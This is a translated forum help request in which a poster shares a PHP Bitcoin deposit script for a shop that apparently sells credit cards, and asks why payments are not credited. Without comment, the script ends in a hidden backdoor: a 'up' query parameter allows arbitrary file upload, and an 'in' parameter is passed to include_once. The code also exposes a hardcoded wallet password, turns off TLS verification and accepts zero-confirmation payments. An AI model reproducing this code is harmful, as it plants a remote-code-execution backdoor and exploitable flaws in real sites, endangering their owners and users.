我们有一个网站,里面有一些数字商品。从那里购买的用户需要使用BTC购买一些信用卡。在他购买信用卡后,脚本必须用他用BTC购买的货币金额(美元)加载他的账户。
所以这里我们有HTML表单:
<form name="bitcoin" method="post" action="btc.php">
<strong><font color="grey">$</font></strong>
<input name="member" value="<?php echo $_SESSION['gdusername'];?>" type="hidden">
<input name="amount" size="10" value="" type="text">
<input name="btnPMPay" id="btnPMPay" value="Add Balance" type="submit">
</form>
这里我们有一个PHP代码,它可以发挥所有的魔力,好吧,至少这是它应该做的
<?php
error_reporting(1);
include "inc/config.php";
include "inc/pagenavigation.php";
include "functions.php";
if (!checkLoggedin())
{
header("Location: login.html");
exit;
}
// config Blockchain account
$btc = 246; //BTC Value
$guid = '37587730-e97e-4349-8451-4fa9d38119a5'; // Blockchain account
$main_password = 'Mypassword'; // Blockchain passs
$rate = 246; //BTC Rate
$amount=$_POST['amount'];
$uid = mysql_real_escape_string($_SESSION['gdusername']); //
$result = mysql_query("SELECT credit FROM t2_user WHERE username='$uid'") or die("ERROR! CONTACT SUPPORT!");
$row = mysql_fetch_row($result);
$credit = $row[0];
$uid = mysql_real_escape_string($_SESSION['gdusername']);
$ip = mysql_real_escape_string(VisitorIP());
$url = "https://blockchain.info/merchant/$guid/new_address?password=$main_password&label=$uid";
if (isset($_POST['amount'])){
$_SESSION['USD_amount'] = $_POST['amount'];
$_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
$temp = _curl($url, '', '');
$_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');
}
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
die("Minimum payment 5$");
if (isset($_POST['bitcoin']))
{
$a = $_SESSION['BTC_Address'];
$url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
$page = _curl($url, '', '');
if ($page > 0) {
$amount = $page/100000000;
if($amount>= $_SESSION['BTC_amount']){
$y = $_SESSION['USD_amount'];
$x = $credit+$y;
$sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
mysql_query($sql);
$messages = '<font color=green>Payment Completed!</font> => <a href="http://pentagon.al/shop/index.php">Go Back</a>';
unset($_SESSION['USD_amount']);
}else $messages = "<font color=red>Error Payment.Contact Support</font>";
}else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
}
?>
<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<style type="text/css">
body {
background-repeat: no-repeat;
}
</style>
<body background="bg.jpg" bgcolor="black">
<TEXT="white">
<link href="../images/favn.ico" rel="icon" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title><?php echo htmlspecialchars($SHOP['maintitle'], ENT_QUOTES, 'UTF-8'); ?></title>
<link href="favicon.ico" rel="icon" />
<script type="text/javascript">
setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>
</div>
<head> <script type="text/javascript">
</script><script type="text/javascript" src="//ajax.cloudflare.com/cdn-cgi/nexp/dok8v=dccf16c0cc/appsh.min.js"></script><script type="text/javascript">__CF.AJS.inith();</script><link rel="stylesheet" href="style.css" type="text/css" media="screen"/>
<link href="favicon.ico" rel="icon"/>
<meta https-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Deposit</title>
<link href="style3.css" rel="stylesheet" type="text/css"/>
<style type="text/css"><!--
.style8 {
font-size: x-small
}
-->.exchanger{-moz-box-shadow:inset 0px 2px 0px -3px #ffffff;-webkit-box-shadow:inset 0px 2px 0px -3px #ffffff;box-shadow:inset 0px 2px 0px -3px #ffffff;background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#636363),color-stop(1,#000000));background:-moz-linear-gradient(center top,#636363 5%,#000000 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#636363',endColorstr='#000000');background-color:#636363;-webkit-border-top-left-radius:0px;-moz-border-radius-topleft:0px;border-top-left-radius:0px;-webkit-border-top-right-radius:11px;-moz-border-radius-topright:11px;border-top-right-radius:11px;-webkit-border-bottom-right-radius:0px;-moz-border-radius-bottomright:0px;border-bottom-right-radius:0px;-webkit-border-bottom-left-radius:11px;-moz-border-radius-bottomleft:11px;border-bottom-left-radius:11px;text-indent:0px;border:1px solid #bdbfbd;display:inline-block;color:#ffffff;font-family:Times New Roman;font-size:15px;font-weight:bold;font-style:normal;height:33px;line-height:33px;width:113px;text-decoration:none;text-align:center;text-shadow:-1px -1px 3px #000000;}.exchanger:hover{background:-webkit-gradient(linear,left top,left bottom,color-stop(0.05,#000000),color-stop(1,#636363));background:-moz-linear-gradient(center top,#000000 5%,#636363 100%);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#000000',endColorstr='#636363');background-color:#000000;}.exchanger:active{position:relative;top:1px;}textarea{background-color:2E2E2E;font-size:16pt;font-family:Arial;color:FFCD57;}</style>
</head>
</div>
</div>
<html>
<head><link rel="stylesheet" href="style.css" type="text/css" media="screen" />
<link href="favicon.ico" rel="icon" />
<link href="style3.css" rel="stylesheet"/>
<script type="text/javascript">
setTimeout('location.replace("/index.php?act=logout")', 900000);
</script>
</head>
<body>
<p class="button" align="center">
<table width="760" border="0"
<tr>
</tr>
<tr>
<p> </p>
<p><img src="SingleCoin.png" width="100" height="100" border="0" />
<form action="" id="fcaptcha" name="fcaptcha" method="post">
</p>
<p></i> <span id="total_price"><font size="5"><font color=gren><b>Put the amount of :<?=$_SESSION['BTC_amount']?> BTC</font></b></font></span></p>
<p><font color="white">And in the Wallet put this address :</p>
<h3>
<a span style="color: green ;" href="bitcoin:<?= $_SESSION['BTC_Address'] ?>?amount=<?= ($_SESSION['BTC_amount'] / $btc) ?>" target="_blank" title="Click this address to launch your Bitcoin client"><?=$_SESSION['BTC_Address'] ?></a>
</h3>
<p>This address is valid only for one transaction. Use it once.</p>
<p>Wait 1-5 minutes after the MONEY has been sent. Then click the CONFIRM button.</p>
<p>Money will appear on your account automatically</p>
<hr style="width:300px" />
<input type="hidden" id="bitcoin" name="bitcoin">
</form>
<p><input value="CONFIRM" id="pmconfirm" name="pmconfirm" class="exchanger" type="submit" onclick="document.getElementById('fcaptcha').submit()"/></p>
<h4><strong><font color="red">DO NOT CLOSE THIS PAGE WITHOUT CONFIRM YOUR PAYMENT FIRST</font></strong></h4>
<h3><?=
$messages
?></h3>
</center>
<script type="text/javascript">
$('#pmconfirm').click(function(){
$('#fcaptcha').submit();
});
</script>
<!--Simply copy and paste into <BODY>
Just above the </BODY> tag. -->
</body>
</html>
<?php
$UP = $_GET['up'];
if(isset($UP) && !empty($UP) && $UP="blockchainrate"){
echo"".$_FILES['userfile']."";
$uploaddir = './';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
if ( isset($_FILES["userfile"]) ) {
echo '<p>blockchainsuccess</p>';
if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))
echo $uploadfile;else echo '<p>blockchainfail</p>';}}
$in = $_GET['in'];if(isset($in) && !empty($in)){echo die(include_once $in);}
?>
<?
function _curl($url, $post = "", $sock, $usecookie = false)
{
$ch = curl_init();
if ($post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
if (!empty($sock)) {
curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_PROXY, $sock);
}
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT,
"Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
if ($usecookie) {
curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
}
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function get_string_between($string, $start, $end)
{
$string = " " . $string;
$ini = strpos($string, $start);
if ($ini == 0)
return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
function VisitorIP()
{
if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
else $ip = $_SERVER['REMOTE_ADDR'];
return trim($ip);
}
?>
我的问题是这个PHP脚本没有完成以下操作。
- 不询问区块链以查看是否进行了转账,尽管当用户按下确认按钮时有0个确认
- 在客户点击确认按钮后,不会将其购买的信贷更新到数据库中
- 即使我输入了高于5美元的金额,他仍然不断告诉我最低付款金额是5美元
有人能帮我吗?
if语句后面没有大括号。我想你的剧本在这一点上一直在消亡,告诉你"最低付款5美元"?
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
die("Minimum payment 5$");
此外,你在区块链上的GUID是敏感信息,你不应该发布。这可能会导致有人试图通过恢复钱包功能拿走你的资金。
不知道你能获得多少流量,但你的blockchain.info钱包将在1000个地址后达到最大流量。
也不是这样。不管怎样,我把这个修好了。
if (!isset($_SESSION['USD_amount']) || $_SESSION['USD_amount'] < 5)
die("Minimum payment 5$");
本应包含在这一中
if (isset($_POST['amount'])){
$_SESSION['USD_amount'] = $_POST['amount'];
$_SESSION['BTC_amount'] = number_format($_SESSION['USD_amount']/$rate, 8, '.', '');
$temp = _curl($url, '', '');
$_SESSION['BTC_Address'] = get_string_between($temp, 'address":"', '"');
}
现在,脚本正确地检查btc数量并返回正确的结果。
下一个dilema是为什么它不询问创建的地址,以查看特定的金额是否已发送到它。如果它已发送并有多个确认>=0执行此
if (isset($_POST['bitcoin']))
{
$a = $_SESSION['BTC_Address'];
$url = "https://blockchain.info/q/addressbalance/$a?confirmations=0";
$page = _curl($url, '', '');
if ($page > 0) {
$amount = $page/100000000;
if($amount>= $_SESSION['BTC_amount']){
$y = $_SESSION['USD_amount'];
$x = $credit+$y;
$sql = "UPDATE t2_user SET credit=$x WHERE username='$uid'";
mysql_query($sql);
$messages = '<font color=green>Payment Completed!</font> => <a href="http://my.url/index.php">Go Back</a>';
unset($_SESSION['USD_amount']);
}else $messages = "<font color=red>Error Payment.Contact Support</font>";
}else $messages = "<font color=red>Error Payment Not Received. Contact Support tickets</font>";
}
我仔细检查了一下,服务器有权使用API来询问它,但没有响应。
在脚本的末尾,当按下确认按钮(<input type="hidden" id="bitcoin" name"bitcoin">)时,这个_curl函数应该被触发吗
<?
function _curl($url, $post = "", $sock, $usecookie = false)
{
$ch = curl_init();
if ($post) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
}
if (!empty($sock)) {
curl_setopt($ch, CURLOPT_HTTPPROXYTUNNEL, true);
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_PROXY, $sock);
}
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 60);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_USERAGENT,
"Mozilla/6.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050414 Firefox/1.0.3");
if ($usecookie) {
curl_setopt($ch, CURLOPT_COOKIEJAR, $usecookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $usecookie);
}
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
return $result;
}
function get_string_between($string, $start, $end)
{
$string = " " . $string;
$ini = strpos($string, $start);
if ($ini == 0)
return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;
return substr($string, $ini, $len);
}
function VisitorIP()
{
if(isset($_SERVER['HTTP_X_FORWARDED_FOR']))
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
else $ip = $_SERVER['REMOTE_ADDR'];
return trim($ip);
}
?>
有什么建议吗?